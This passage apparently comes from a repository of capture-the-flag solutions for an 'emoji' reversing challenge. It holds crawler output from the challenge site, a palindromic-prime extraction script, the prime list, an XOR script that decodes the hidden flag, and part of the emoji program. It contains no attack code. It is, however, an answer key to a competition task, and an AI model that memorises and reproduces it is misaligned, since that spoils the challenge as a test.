79 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/968674872368d11d99758f9f4fa33d58.html", "images": []},
80 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/75f4f167ff1f7420bbc1cd9e3cd582f9.html", "images": []},
81 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-20.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-20.png", "path": "full/a7ed03a5f862a227aa9d8a231d5e14bc597e8def.jpg", "checksum": "236d0aa6d08e984f81373d69b669333c"}]},
82 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/cb6a01e6c7b12a34da7e15a1929a759b.html", "images": []},
83 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-49.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-49.png", "path": "full/2a7d838a735bbbe9784d64c3b4cb339eb928bb0c.jpg", "checksum": "3e1d3b4a606895d4bcf1acc097363d23"}]},
84 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-42.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-42.png", "path": "full/03442a8406ee2b5255a3ac872c1b5211d9008f49.jpg", "checksum": "627c23085ed8528e3a91b71753ef986c"}]},
85 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-51.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-51.png", "path": "full/ce76d6761ad80a79aeac15f03acf666e9d466219.jpg", "checksum": "27e13a585db629ffa98bafd195fd771d"}]},
86 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-09.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-09.png", "path": "full/11853c4bbb6d521d9251b8c6951c37f53a121045.jpg", "checksum": "187b33cc13b1b099f6c407c1747498ce"}]},
87 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-06.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-06.png", "path": "full/2eb685ba86b77cd8a7e8d6a98757bf0885d6c1e9.jpg", "checksum": "85a7eb69afe794b7e851701004abb82c"}]},
88 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-13.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-13.png", "path": "full/9db8d2413cad5c2f8dc47c615fe5e0815bc71198.jpg", "checksum": "ee28eed52b3371bdcba0c7c5b589cf91"}]},
89 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-18.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-18.png", "path": "full/5d6851300fd32edf5f96f3fa8831500de0a3260c.jpg", "checksum": "94195d9ab48cf7faf2841d70a173a357"}]},
90 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-39.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-39.png", "path": "full/12230330606de58c0ba46cb77e33addcf3df3bfe.jpg", "checksum": "2a3cb43ab82a0c62eeb9230bf78af7d3"}]},
91 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-43.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-43.png", "path": "full/da6110fb99479ae926a34e3a08068ac1c2a00136.jpg", "checksum": "b746b1c0eb5f84aa47c1be58bab022b9"}]},
92 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-23.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-23.png", "path": "full/7693e8259b7b7c7aa823b546c1a4c12b8e0c5ef5.jpg", "checksum": "30fe42155b01005de1a64b2b1487d28f"}]},
93 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-40.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-40.png", "path": "full/66b6dfb9742608a53e3a9887df11937c62af5486.jpg", "checksum": "06343e6e9d77192137fe12a5e611b0d7"}]},
94 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-02.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-02.png", "path": "full/a157f2aacd198c0e467930b621a58a710bf62003.jpg", "checksum": "db50c0c3335cb6edcdf43e9b6d63996d"}]},
95 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-38.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-38.png", "path": "full/56fccaa3f7f732e6a81659d0c3650f919418a1b9.jpg", "checksum": "9ec1f3016c3382d02c9993241456abbb"}]},
96 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/1dec2ca01d4483533348b872bff74c6f.html", "images": []},
97 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/835d04820fb39bafd50547f6859f4729.html", "images": []},
98 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/647ac82477b912a3b93c751111202ecf.html", "images": []},
99 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5dbbfb29d8308ee367eac88d25c2b1d4.html", "images": []},
100 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/2c1ff627fad3ccf58988458183d04207.html", "images": []},
101 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-24.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-24.png", "path": "full/eaf9275859066337ee9705a8704be9135890bac7.jpg", "checksum": "7bdc16e7b04575df41b98d5ebcfb08d0"}]},
102 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-44.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-44.png", "path": "full/e2491453f23a56d000f9bb1f94c50bbfd1a49f88.jpg", "checksum": "19eeaf7c454c769e6549dc1975b9bec2"}]},
103 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-11.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-11.png", "path": "full/032025a04942044e0f52ef1b93adbd320bce5c03.jpg", "checksum": "2925ccc7fd21146022744fdff2bed4cb"}]},
104 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-41.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-41.png", "path": "full/b4e5ce6a49dcc0a52ba4718bcac7ed7dfcd2c363.jpg", "checksum": "30567c6ebf0a10c5fe6263ec3dd96a34"}]},
105 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-55.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-55.png", "path": "full/e882748be2bc4164a96f7e68a11c45c6fc7e4f21.jpg", "checksum": "39c33b88672614615684d0f68a333f41"}]},
106 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-04.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-04.png", "path": "full/888145b3870b3aa0ac76bdb8f058ccbd9c24294b.jpg", "checksum": "4634f7a31cc78f720af264eb88b54823"}]},
107 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-19.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-19.png", "path": "full/b5a863b50e48f479df73287fea653eb38aae756a.jpg", "checksum": "021adc2e8e0599aa5ace57def75595aa"}]},
108 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-32.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-32.png", "path": "full/4296a5117242aa1f727f602d9b61184399f97ae1.jpg", "checksum": "2d3f07e51e4b8bd9851814cf455b5b3f"}]},
109 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-35.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-35.png", "path": "full/9190ffcff48c22b119389d57737ddcac12018867.jpg", "checksum": "ce459ca6cf2cf65f7204bf1221a05f5a"}]},
110 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-54.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-54.png", "path": "full/d18af402bddd63c6fbe50fa3dd5ef2b3a1c7eba1.jpg", "checksum": "dcc4c0992df45ca75a3cf2ba43b28389"}]},
111 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-03.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-03.png", "path": "full/46cbe8e778a2d9810ec093fd4411358559ebbaa9.jpg", "checksum": "4df7ec39415813ef368595efbb93ed0b"}]},
112 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-17.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-17.png", "path": "full/f170155323cc57d63c8652a19ec02ec817015b01.jpg", "checksum": "be42c8d16ae37258c72a10f9c1bf9d34"}]},
113 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-22.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-22.png", "path": "full/b66cef15fb1f24f0357c293fabd1ee4ae370fcea.jpg", "checksum": "da8327ecd3cf8045541b5297509d3b55"}]}
114 | ][
115 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com", "img": "
", "images": []},
116 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/7e7399c7d06333ec886eee6b678d3595.html", "img": "
", "images": []},
117 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/eaccf8725acda38ec2c1d9a591d54601.html", "img": "
", "images": []},
118 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/94ad2d38e6c461572bad2199d0fd00ff.html", "img": "
", "images": []},
119 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c4827b3b9c0c9e94183f30303f1cf8cf.html", "img": "
", "images": []},
120 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/211fb2008f7e90b83c307931957642aa.html", "img": "
", "images": []},
121 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b9ef5a48186aacc5a1ca7e3f6edd48d2.html", "img": "
", "images": []},
122 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9f6b0fe40439503e23e68e62a8af8e52.html", "img": "
", "images": []},
123 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/cdea521070598db1a707d2e143e374e3.html", "img": "
", "images": []},
124 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/bc38f47945d2d515719a37dacd214240.html", "img": "
", "images": []},
125 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/0aecf5c83a232343bb1b1b7ffb666438.html", "img": "
", "images": []},
126 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9f9dbf163a76a90fd2a6b4de1010841e.html", "img": "
", "images": []},
127 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c2817b54b53077139e388c240060035f.html", "img": "
", "images": []},
128 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5bfb79469792c7dde95217f19536be92.html", "img": "
", "images": []},
129 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f0ce6a8adea95e300fab564bf80689d9.html", "img": "
", "images": []},
130 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c2d71f56f6b55ef8ded7544d45717c92.html", "img": "
", "images": []},
131 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/1110015dc696d6c73e3f9aece0a8bcd9.html", "img": "
", "images": []},
132 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5850a44366b4286c2d2f758a05c246f5.html", "img": "
", "images": []},
133 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/41c19f57ef225ddb1c63a4d1b008214c.html", "img": "
", "images": []},
134 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f9e55e5fefd6ab08428c35b310bddbaf.html", "img": "
", "images": []},
135 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9ca6dd45f49a59e5a8e2e87294acb42e.html", "img": "
", "images": []},
136 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b50d83f0910a5ecc2809ff6576d8e845.html", "img": "
", "images": []},
137 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/168d5019cd091949cbbdc06acb80d78a.html", "img": "
", "images": []},
138 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f30bc5c7375ba52fed40659140e6460e.html", "img": "
", "images": []},
139 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/4d1f3b376efdb55bcf4d6ac77b088073.html", "img": "
", "images": []},
140 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/fedcf4569e5de4486998651b0f804ae5.html", "img": "
", "images": []},
141 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d4f3400fc1c3427d937821b012f7aecc.html", "img": "
", "images": []},
142 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/455a9d95d3f48a2703d02e734d18ab14.html", "img": "
", "images": []},
143 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/4b556ca0f01983aca5856901d1e5a2d1.html", "img": "
", "images": []},
144 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/42c8cc7f22acfa5d7ef297bdae2ba743.html", "img": "
", "images": []},
145 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/253e66a37fe263f34cfe46d817b3cd16.html", "img": "
", "images": []},
146 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/656eb695e3bb2feab65808d5bec205f2.html", "img": "
", "images": []},
147 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/8b163f2f9559f60517c09fa6a177da79.html", "img": "
", "images": []},
148 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/1dec2ca01d4483533348b872bff74c6f.html", "img": "
", "images": []},
149 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d048074b981e463b4df2bf24b09d51c9.html", "img": "
", "images": []},
150 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d5759ae9d021e5749b4fb627c539c51c.html", "img": "
", "images": []},
151 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/750842afeb0e9be2b12e022b166c0a1c.html", "img": "
", "images": []},
152 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/ebf110c11d160eaaa91d441305ff8874.html", "img": "
", "images": []},
153 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/75f4f167ff1f7420bbc1cd9e3cd582f9.html", "img": "
", "images": []},
154 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d929d4e9b615822d28e3c74cc3df0a36.html", "img": "
", "images": []},
155 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/cb6a01e6c7b12a34da7e15a1929a759b.html", "img": "
", "images": []},
156 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d8dc0f5386fc47d7f65df3134de92fff.html", "img": "
", "images": []},
157 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/e0b54759634476f01beffd1f0171ede1.html", "img": "
", "images": []},
158 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/bae8f02cb87dcb8f13fa8ba41a45ba70.html", "img": "
", "images": []},
159 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d4b30b716bfa0481c0d77a40e49c18d5.html", "img": "
", "images": []},
160 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/27c57d4efda38a82a001127bf3409e45.html", "img": "
", "images": []},
161 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/968674872368d11d99758f9f4fa33d58.html", "img": "
", "images": []},
162 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/baa23943b1a503845bdef9cdf4700a08.html", "img": "
", "images": []},
163 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/3942ec1a459fcf0a2270e9e2b1b735d9.html", "img": "
", "images": []},
164 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b96110364868f63f1f6d0967addad330.html", "img": "
", "images": []},
165 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f10e496cacb28e2a77eb8f750741440e.html", "img": "
", "images": []},
166 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/835d04820fb39bafd50547f6859f4729.html", "img": "
", "images": []},
167 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/2c1ff627fad3ccf58988458183d04207.html", "img": "
", "images": []},
168 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/647ac82477b912a3b93c751111202ecf.html", "img": "
", "images": []},
169 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/22157e71e3d340dbc1191565ccf97544.html", "img": "
", "images": []},
170 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5dbbfb29d8308ee367eac88d25c2b1d4.html", "img": "
", "images": []}
171 | ]
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/scrapy.cfg:
--------------------------------------------------------------------------------
1 | # Automatically created by: scrapy startproject
2 | #
3 | # For more information about the [deploy] section see:
4 | # https://scrapyd.readthedocs.io/en/latest/deploy.html
5 |
6 | [settings]
7 | default = ctf_crawl.settings
8 |
9 | [deploy]
10 | #url = http://localhost:6800/
11 | project = ctf_crawl
12 |
--------------------------------------------------------------------------------
/07-reversing-emoji/extract-palindroms.py:
--------------------------------------------------------------------------------
1 | # primes list downloaded from https://primes.utm.edu/lists/small/millions/
2 |
3 | def is_palindrome(str):
4 | return str == str[::-1]
5 |
6 | filenames = ['primes1.txt', 'primes2.txt', 'primes3.txt', 'primes4.txt', 'primes5.txt', 'primes6.txt']
7 |
8 | palindromes = []
9 | for filename in filenames:
10 | with open(filename, 'r') as f:
11 | primes = ['']
12 | primes.extend(f.read().split())
13 |
14 | p = [int(n) for n in map(str.strip, filter(is_palindrome, filter(None, primes)))]
15 | palindromes.extend(p)
16 |
17 | print("found {} palindromes".format(len(p)))
18 |
19 | with open('palindromes', 'w') as f:
20 | f.write(','.join(map(str, palindromes)))
21 |
--------------------------------------------------------------------------------
/07-reversing-emoji/palindromes:
--------------------------------------------------------------------------------
1 | 2,3,5,7,11,101,131,151,181,191,313,353,373,383,727,757,787,797,919,929,10301,10501,10601,11311,11411,12421,12721,12821,13331,13831,13931,14341,14741,15451,15551,16061,16361,16561,16661,17471,17971,18181,18481,19391,19891,19991,30103,30203,30403,30703,30803,31013,31513,32323,32423,33533,34543,34843,35053,35153,35353,35753,36263,36563,37273,37573,38083,38183,38783,39293,70207,70507,70607,71317,71917,72227,72727,73037,73237,73637,74047,74747,75557,76367,76667,77377,77477,77977,78487,78787,78887,79397,79697,79997,90709,91019,93139,93239,93739,94049,94349,94649,94849,94949,95959,96269,96469,96769,97379,97579,97879,98389,98689,1003001,1008001,1022201,1028201,1035301,1043401,1055501,1062601,1065601,1074701,1082801,1085801,1092901,1093901,1114111,1117111,1120211,1123211,1126211,1129211,1134311,1145411,1150511,1153511,1160611,1163611,1175711,1177711,1178711,1180811,1183811,1186811,1190911,1193911,1196911,1201021,1208021,1212121,1215121,1218121,1221221,1235321,1242421,1243421,1245421,1250521,1253521,1257521,1262621,1268621,1273721,1276721,1278721,1280821,1281821,1286821,1287821,1300031,1303031,1311131,1317131,1327231,1328231,1333331,1335331,1338331,1343431,1360631,1362631,1363631,1371731,1374731,1390931,1407041,1409041,1411141,1412141,1422241,1437341,1444441,1447441,1452541,1456541,1461641,1463641,1464641,1469641,1486841,1489841,1490941,1496941,1508051,1513151,1520251,1532351,1535351,1542451,1548451,1550551,1551551,1556551,1557551,1565651,1572751,1579751,1580851,1583851,1589851,1594951,1597951,1598951,1600061,1609061,1611161,1616161,1628261,1630361,1633361,1640461,1643461,1646461,1654561,1657561,1658561,1660661,1670761,1684861,1685861,1688861,1695961,1703071,1707071,1712171,1714171,1730371,1734371,1737371,1748471,1755571,1761671,1764671,1777771,1793971,1802081,1805081,1820281,1823281,1824281,1826281,1829281,1831381,1832381,1842481,1851581,1853581,1856581,1865681,1876781,1878781,1879781,1880881,1881881,1883881,1884881,1895981,1903091,1908091,1909091,1917191,1924291,1930391,1936391,1941491,1951591,1952591,1957591,1958591,1963691,1968691,1969691,1970791,1976791,1981891,1982891,1984891,1987891,1988891,1993991,1995991,1998991,3001003,3002003,3007003,3016103,3026203,3064603,3065603,3072703,3073703,3075703,3083803,3089803,3091903,3095903,3103013,3106013,3127213,3135313,3140413,3155513,3158513,3160613,3166613,3181813,3187813,3193913,3196913,3198913,3211123,3212123,3218123,3222223,3223223,3228223,3233323,3236323,3241423,3245423,3252523,3256523,3258523,3260623,3267623,3272723,3283823,3285823,3286823,3288823,3291923,3293923,3304033,3305033,3307033,3310133,3315133,3319133,3321233,3329233,3331333,3337333,3343433,3353533,3362633,3364633,3365633,3368633,3380833,3391933,3392933,3400043,3411143,3417143,3424243,3425243,3427243,3439343,3441443,3443443,3444443,3447443,3449443,3452543,3460643,3466643,3470743,3479743,3485843,3487843,3503053,3515153,3517153,3528253,3541453,3553553,3558553,3563653,3569653,3586853,3589853,3590953,3591953,3594953,3601063,3607063,3618163,3621263,3627263,3635363,3643463,3646463,3670763,3673763,3680863,3689863,3698963,3708073,3709073,3716173,3717173,3721273,3722273,3728273,3732373,3743473,3746473,3762673,3763673,3765673,3768673,3769673,3773773,3774773,3781873,3784873,3792973,3793973,3799973,3804083,3806083,3812183,3814183,3826283,3829283,3836383,3842483,3853583,3858583,3863683,3864683,3867683,3869683,3871783,3878783,3893983,3899983,3913193,3916193,3918193,3924293,3927293,3931393,3938393,3942493,3946493,3948493,3964693,3970793,3983893,3991993,3994993,3997993,3998993,7014107,7035307,7036307,7041407,7046407,7057507,7065607,7069607,7073707,7079707,7082807,7084807,7087807,7093907,7096907,7100017,7114117,7115117,7118117,7129217,7134317,7136317,7141417,7145417,7155517,7156517,7158517,7159517,7177717,7190917,7194917,7215127,7226227,7246427,7249427,7250527,7256527,7257527,7261627,7267627,7276727,7278727,7291927,7300037,7302037,7310137,7314137,7324237,7327237,7347437,7352537,7354537,7362637,7365637,7381837,7388837,7392937,7401047,7403047,7409047,7415147,7434347,7436347,7439347,7452547,7461647,7466647,7472747,7475747,7485847,7486847,7489847,7493947,7507057,7508057,7518157,7519157,7521257,7527257,7540457,7562657,7564657,7576757,7586857,7592957,7594957,7600067,7611167,7619167,7622267,7630367,7632367,7644467,7654567,7662667,7665667,7666667,7668667,7669667,7674767,7681867,7690967,7693967,7696967,7715177,7718177,7722277,7729277,7733377,7742477,7747477,7750577,7758577,7764677,7772777,7774777,7778777,7782877,7783877,7791977,7794977,7807087,7819187,7820287,7821287,7831387,7832387,7838387,7843487,7850587,7856587,7865687,7867687,7868687,7873787,7884887,7891987,7897987,7913197,7916197,7930397,7933397,7935397,7938397,7941497,7943497,7949497,7957597,7958597,7960697,7977797,7984897,7985897,7987897,7996997,9002009,9015109,9024209,9037309,9042409,9043409,9045409,9046409,9049409,9067609,9073709,9076709,9078709,9091909,9095909,9103019,9109019,9110119,9127219,9128219,9136319,9149419,9169619,9173719,9174719,9179719,9185819,9196919,9199919,9200029,9209029,9212129,9217129,9222229,9223229,9230329,9231329,9255529,9269629,9271729,9277729,9280829,9286829,9289829,9318139,9320239,9324239,9329239,9332339,9338339,9351539,9357539,9375739,9384839,9397939,9400049,9414149,9419149,9433349,9439349,9440449,9446449,9451549,9470749,9477749,9492949,9493949,9495949,9504059,9514159,9526259,9529259,9547459,9556559,9558559,9561659,9577759,9583859,9585859,9586859,9601069,9602069,9604069,9610169,9620269,9624269,9626269,9632369,9634369,9645469,9650569,9657569,9670769,9686869,9700079,9709079,9711179,9714179,9724279,9727279,9732379,9733379,9743479,9749479,9752579,9754579,9758579,9762679,9770779,9776779,9779779,9781879,9782879,9787879,9788879,9795979,9801089,9807089,9809089,9817189,9818189,9820289,9822289,9836389,9837389,9845489,9852589,9871789,9888889,9889889,9896989,9902099,9907099,9908099,9916199,9918199,9919199,9921299,9923299,9926299,9927299,9931399,9932399,9935399,9938399,9957599,9965699,9978799,9980899,9981899,9989899,100030001,100050001,100060001,100111001,100131001,100161001,100404001,100656001,100707001,100767001,100888001,100999001,101030101,101060101,101141101,101171101,101282101,101292101,101343101,101373101,101414101,101424101,101474101,101595101,101616101,101717101,101777101,101838101,101898101,101919101,101949101,101999101,102040201,102070201,102202201,102232201,102272201,102343201,102383201,102454201,102484201,102515201,102676201,102686201,102707201,102808201,102838201,103000301,103060301,103161301,103212301,103282301,103303301,103323301,103333301,103363301,103464301,103515301,103575301,103696301,103777301,103818301,103828301,103909301,103939301,104000401,104030401,104040401,104111401,104222401,104282401,104333401
--------------------------------------------------------------------------------
/07-reversing-emoji/palindromes.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | first = [106,119,113,119,49,74,172,242,216,208,339,264,344,267,743,660,893,892,1007,975,10319,10550,10503,11342,11504,12533,12741,12833,13437,13926,13893,14450,14832,15417,15505,16094,16285,16599,16758,17488]
4 |
5 | second = [93766,93969,94440,94669,94952,94865,95934,96354,96443,96815,97280,97604,97850,98426]
6 |
7 | third = [9916239,9918082,9919154,9921394,9923213,9926376,9927388,9931494,9932289,9935427,9938304,9957564,9965794,9978842,9980815,9981858,9989997,100030045,100049982,100059926,100111100,100131019,100160922,100404094,100656111,100707036,100767085,100887990,100998966,101030055,101060206,101141058]
8 |
9 |
10 | with open('palindromes', 'r') as f:
11 | palindromes = list(map(int, f.read().split(',')))
12 |
13 | for i in range(len(first)):
14 | sys.stdout.write(chr(first[i] ^ palindromes[i]))
15 |
16 | for i in range(len(second)):
17 | sys.stdout.write(chr(second[i] ^ palindromes[i + 98]))
18 |
19 | for i in range(len(third)):
20 | sys.stdout.write(chr(third[i] ^ palindromes[i + 764]))
--------------------------------------------------------------------------------
/07-reversing-emoji/program:
--------------------------------------------------------------------------------
1 | 🚛 🥇 0️⃣ ✋ 📥 🥇
2 | 🚛 🥇 1️⃣ 7️⃣ 4️⃣ 8️⃣ 8️⃣ ✋ 📥 🥇
3 | 🚛 🥇 1️⃣ 6️⃣ 7️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇
4 | 🚛 🥇 1️⃣ 6️⃣ 5️⃣ 9️⃣ 9️⃣ ✋ 📥 🥇
5 | 🚛 🥇 1️⃣ 6️⃣ 2️⃣ 8️⃣ 5️⃣ ✋ 📥 🥇
6 | 🚛 🥇 1️⃣ 6️⃣ 0️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
7 | 🚛 🥇 1️⃣ 5️⃣ 5️⃣ 0️⃣ 5️⃣ ✋ 📥 🥇
8 | 🚛 🥇 1️⃣ 5️⃣ 4️⃣ 1️⃣ 7️⃣ ✋ 📥 🥇
9 | 🚛 🥇 1️⃣ 4️⃣ 8️⃣ 3️⃣ 2️⃣ ✋ 📥 🥇
10 | 🚛 🥇 1️⃣ 4️⃣ 4️⃣ 5️⃣ 0️⃣ ✋ 📥 🥇
11 | 🚛 🥇 1️⃣ 3️⃣ 8️⃣ 9️⃣ 3️⃣ ✋ 📥 🥇
12 | 🚛 🥇 1️⃣ 3️⃣ 9️⃣ 2️⃣ 6️⃣ ✋ 📥 🥇
13 | 🚛 🥇 1️⃣ 3️⃣ 4️⃣ 3️⃣ 7️⃣ ✋ 📥 🥇
